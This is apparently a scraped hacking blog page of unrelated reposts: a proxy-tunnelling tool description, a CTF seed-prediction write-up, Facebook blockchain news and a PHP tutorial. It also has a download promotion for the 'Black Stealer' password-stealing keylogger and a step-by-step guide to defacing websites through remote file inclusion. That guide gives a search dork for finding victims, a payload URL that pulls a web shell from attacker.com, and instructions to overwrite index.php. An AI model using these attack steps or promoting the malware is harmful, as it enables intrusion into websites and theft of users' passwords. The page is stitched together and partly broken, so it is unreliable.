domingo, 26 de abril de 2020

Wotop - Web On Top Of Any Protocol


WOTOP is a tool meant to tunnel any sort of traffic over a standard HTTP channel.
Useful for scenarios where there's a proxy filtering all traffic except standard HTTP(S) traffic. Unlike other tools which either require you to be behind a proxy which let's you pass arbitrary traffic (possibly after an initial CONNECT request), or tools which work only for SSH, this imposes no such restrictions.

Working
Assuming you want to use SSH to connect to a remote machine where you don't have root privileges.
There will be 7 entities:
  1. Client (Your computer, behind the proxy)
  2. Proxy (Evil)
  3. Target Server (The remote machine you want to SSH to, from Client)
  4. Client WOTOP process
  5. Target WOTOP process
  6. Client SSH process
  7. Target SSH process
If there was no proxy, the communication would be something like:
Client -> Client SSH process -> Target Server -> Target SSH process
In this scenario, here's the proposed method:
Client -> Client SSH process -> Client WOTOP process -> Proxy -> Target WOTOP process -> Target SSH process -> Target Server
WOTOP simply wraps all the data in HTTP packets, and buffers them accordingly.
Another even more complicated scenario would be if you have an external utility server, and need to access another server's resources from behind a proxy. In this case, wotop will still run on your external server, but instead of using localhost in the second command (Usage section), use the hostname of the target machine which has the host.

Usage
On the client machine:
./wotop <client-hop-port> <server-host-name> <server-hop-port>
On the target machine:
./wotop <server-hop-port> localhost <target-port> SERVER
(Note the keyword SERVER at the end)
In case of SSH, the target-port would be 22. Now once these 2 are running, to SSH you would run the following:
ssh <target-machine-username>@localhost -p <client-hop-port>
Note: The keyword server tells wotop which side of the connection has to be over HTTP.

Planned features
  • Better and adaptive buffering
  • Better CLI flags interface
  • Optional encrypting of data
  • Parsing of .ssh/config file for hosts
  • Web interface for remote server admin
  • Web interface for local host
  • Daemon mode for certain configs

Bugs
  • Currently uses a 100ms sleep after every send/receive cycle to bypass some memory error (not yet eliminated).
  • HTTP Responses may come before HTTP Requests. Let me know if you know of some proxy which blocks such responses.
  • Logger seems to be non-thread-safe, despite locking. Leads to memory errors, and thus disabled for now.




via KitPloit
More information

  1. Curso De Growth Hacking
  2. Hacking Social
  3. Programas De Hacker
  4. Hacking-Lab
  5. Hacking Etico 101 Pdf
  6. Growth Hacking Barcelona

DOWNLOAD BLACK STEALER V2.1 FULL

BLACK STEALER V2.1 FULL

Black Stealer v2.1 is an advanced keylogger that can steal even saved passwords from the browsers and sends through Email and FTP. It's really easy to the crypt. Keylogger is a computer program that is a type of surveillance technology used to monitor and record each keystroke typed on a specific computer's keyboard by the user, especially in order to gain unauthorized access to the passwords and other confidential information. It's also called a keystroke logger or system monitor. Download black stealer v2.1 full.

DOWNLOAD BLACK STEALER V2.1 FULL

Continue reading

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Related news

  1. Hacking Wifi Android
  2. Hacking Con Python
  3. Web Hacking 101
  4. Growth Hacking Instagram
  5. Aprender A Hackear Desde Cero
  6. Como Convertirse En Hacker
  7. Hacking Software
  8. Hardware Hacking
  9. Foro Hacking
  10. Que Es Growth Hacking
  11. Hacking Pdf

ASIS CTF Quals 2015 - Sawthis Writeup - Srand Remote Prediction


The remote service ask for a name, if you send more than 64 bytes, a memory leak happens.
The buffer next to the name's is the first random value used to init the srand()


If we get this value, and set our local srand([leaked] ^ [luckyNumber]) we will be able to predict the following randoms and win the game, but we have to see few details more ;)

The function used to read the input until the byte \n appears, but also up to 64 bytes, if we trigger this second condition there is not 0x00 and the print shows the random buffer :)

The nickname buffer:



The seed buffer:



So here it is clear, but let's see that the random values are computed with several gpu instructions which are decompiled incorrectly:







We tried to predict the random and aply the gpu divisions without luck :(



There was a missing detail in this predcitor, but there are always other creative ways to do the things.
We use the local software as a predictor, we inject the leaked seed on the local binary of the remote server and got a perfect syncronization, predicting the remote random values:




The process is a bit ugly becouse we combined automated process of leak exctraction and socket interactive mode, with the manual gdb macro.




The macro:



















Related word

sábado, 25 de abril de 2020

Facebook Plans To Launch Its Own Cryptocurrency

Facebook Plans To Launch Its Own Cryptocurrency

Facebook Plans To Launch Its Own Cryptocurrency

Facebook Plans To Launch Its Own Cryptocurrency

The social network giant, Facebook is going through a bad phase with lots of ups and down. The recent scandal with Cambridge Analytica has caused the world's largest social network giant Facebook to change its stance on user privacy and to be more transparent about its use of the data it collects.
Since then, some social networks based in Blockchain have been popularized, namely Sphere, Steemit, and Howdoo. However, recently, something unusual announcement is announced by the social network giant Facebook itself, in which Facebook stated that it is investing in a Blockchain-based solution development team, but, the purpose of the project is not yet known.
It was with a post on the Facebook page that David Marcus confirmed his departure from the Messenger team and the creation of a small group dedicated to finding solutions based on the potential of Blockchain technology for Facebook.
David Marcus has not given much detail on the work he will do with his new group, saying only that they will study Blockchain from scratch so that they can use this revolutionary technology for Facebook.
"I'm setting up a small group to explore how to leverage Blockchain across Facebook, starting from scratch," stated David Marcus.
Despite being connected to Facebook's Messenger since 2014, David Marcus is no novice in these financial issues related to money transfers. In addition to having introduced the possibility of P2P payments in Messenger itself, David Marcus was President of PayPal and CEO of Zong, a company dedicated to payments on mobile devices.
However, his experience in this segment does not allow us to conclude that Facebook will create or support a crypto coin, but, it also doesn't mean that it will launch or support any crypto coin of its own. Blockchain technology has become famous thanks to crypto-coins, especially Bitcoin, but its potential expands dramatically to other areas.
The potential of Blockchain goes from the crypto-coins to the creation of real ecosystems online, supported by the users of the network. Sharing and storing data is a legacy that Blockchain allows you to explore and maybe the fact that Facebook will use it in your favor.
The lead post in Messenger was then handed over to Stan Chudnovsky, who now heads one of the most widely used communication services around the world, alongside WhatsApp.
Rumors also point out that James Everingham and Kevin Weil, both from Instagram, will also join David Marcus in this new onslaught of Facebook to one of today's most acclaimed technologies.

Continue reading


  1. Hacking Growth
  2. Hacking Online Games
  3. Software Hacking
  4. Hacking Curso
  5. Como Hacker
  6. Como Hacker
  7. Significado Hacker
  8. Hacking Hardware
  9. Hacking Linkedin

How To Insert Data Into Database | Tutorial 3


Welcome to my another tutorial of PHP and MYSQL. In the previous tutorial I've briefly discussed How to make a PHP file and How to save the PHP file in the root directory of the server. How to run PHP script over the Web Browser etc.

Now in this tutorial I've discussed about inserting data into database by getting the values from user with the help of HTML form. One thing should be remembered that getting a values from users by HTML form is the only way to get values from users in PHP.

How To Insert Data into Database

Step 1:

Open your text editor and create HTML form. 

Step 2:

Make a database connection in PHP.

Step 3:

Write an INSERT query for the sake of insertion data into database like INSERT INTO table_Name(table_Attribute1, table_Attribute2....) VALUES('1', 'Alex'...); etc. Now watch the video to make a better understanding the concept of insertion.